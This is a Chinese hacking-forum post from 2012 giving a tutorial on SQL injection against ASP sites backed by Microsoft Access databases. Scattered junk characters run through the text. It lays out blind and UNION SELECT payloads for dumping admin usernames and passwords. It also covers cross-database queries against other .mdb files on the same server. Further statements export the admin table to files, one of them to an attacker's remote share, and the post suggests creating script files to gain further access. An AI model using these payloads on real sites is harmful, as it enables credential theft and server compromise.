找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1915|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------. T! l4 S- \3 f
union查询法
) h: @# M: i0 a' T首先要说的就是查询办法,一般的查询办法就是3 c7 S5 m" v& m* |8 h1 q+ ~2 `
- N5 v# C3 E8 S5 Q# C
程序代码6 [. P5 }$ t' G
and 1=(select count(*) from admin where left(id,1)='1')
. P' P+ D/ ?7 k% c! g8 r+ l8 N( K4 w
: G; P9 q, B0 E. V. ?# ?这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
/ L/ i! n8 d+ B" _' E) V所以这个时候,union select横空出现.别以为只能在PHP里用哦...
! w) Y" J+ W4 ^4 M譬如你有一个ACCESS点:
! Q0 a6 s7 p$ c) c程序代码
7 @( ]2 v. u0 l% @1 c, `  Ahttp://bbs.tian6.com/xiaoyang.asp?coder=1
2 x# Q& t5 V7 B2 v! A4 \4 ]  F' p" Q1 E' a9 ?: r0 s& E1 {
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
+ }, Q1 I- E0 p. [/ v+ j& v然后我们直接来:
, k" C3 ~4 Y% x' c% _. F程序代码
; c% X1 s" x$ ihttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]+ [5 Z# i+ Y8 e" g, v9 L2 c

+ u# ~$ n7 O9 w2 {! c4 v. {这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.: n; h. S: H8 n% J, j: t0 m/ T

4 O) t+ }* Z' h6 C, M% Z5 z& h; q1 C" F: y  t) q$ X

% Y# N% v4 K) x+ S$ I---------------------------------------------------------------, O9 D3 Z8 S. n) ?$ t+ r% i) T( y
Access跨库查询0 m, s- `; B3 J
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.+ h4 u) Z- e5 v/ i% F' I( E
跨库的查询语句:
/ j2 v, V' }% m0 N3 O子查询:
: {6 I2 F! O( U程序代码
% J3 \" N0 N6 b/ G  K7 ^" g: dand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>07 Q) r( M5 m, E9 g+ ?3 n) g

2 P; n- H/ |& u4 t& C. H3 kunion查询:: ~. j* ~! @/ A, w3 z; ?
程序代码
  s9 f+ A) j) Bunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=12 M5 @7 u: A2 B, W! {

; c% S& y: B% s  d跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:! C6 q" J$ q3 g
程序代码( `( ?1 E/ }1 `! V' M$ A
http://www.4ngel.net/article/46.htm 6 {1 }# _0 G- y" M: m9 l
http://hf110.com/Article/hack/rqsl/200502/66.html0 ?6 `$ w& T" ~' r( S

6 F; I5 f( q1 \& ]1 g0 w/ q5 W& o---------------------------------------------------------------
" L9 f6 H1 x! k, IAccess注入,导出txt,htm,html; ~6 j4 ?0 L1 V: j8 m" A+ J
子查询语句:
, J; W# F: ~1 @) h3 U程序代码4 L8 t5 V2 C, N# E( m
Select * into [test.txt] in 'd:\web\' 'text;' from admin
% g: _1 y5 X0 I( [. _' i9 [; _  h2 c" `: O( ~6 O
这样就把admin表的内容以test类型存进了d:\web里面.
  R" z0 b. _7 L& e, U6 |; mUNION查询:. l7 b/ Q/ T  v* O) O
程序代码
/ Z& Q+ f' ?: O5 n$ }' h, o. iunion select * into [admin.txt] in 'c:\' 'test;' from admin
1 b0 E4 Z6 N+ i
: F% r9 I6 ?9 k; G4 e) K" m而且这里也可以保存到本地来:
: {+ ~9 d& H" a% B+ t) m& T程序代码+ M/ m3 c1 f$ ]$ `3 z  R* \
Select * into [test.txt] in '\\yourip\share' 'text;' from admin
7 I( _2 |) ~$ M" `
7 [. {* v/ L. {1 T0 r* {! l不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
  y* B' s: B/ C( W0 Q
8 r. f2 f( ~7 K- U1 N3 L程序代码
7 }( Z8 B( }3 @http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7/ S1 z6 Q/ r% B" Z) a, ?! S2 w3 U
2 o8 C& V7 v8 b, E6 U" n; a- W
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.9 f" s& {4 Q, U! d( O% |+ d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表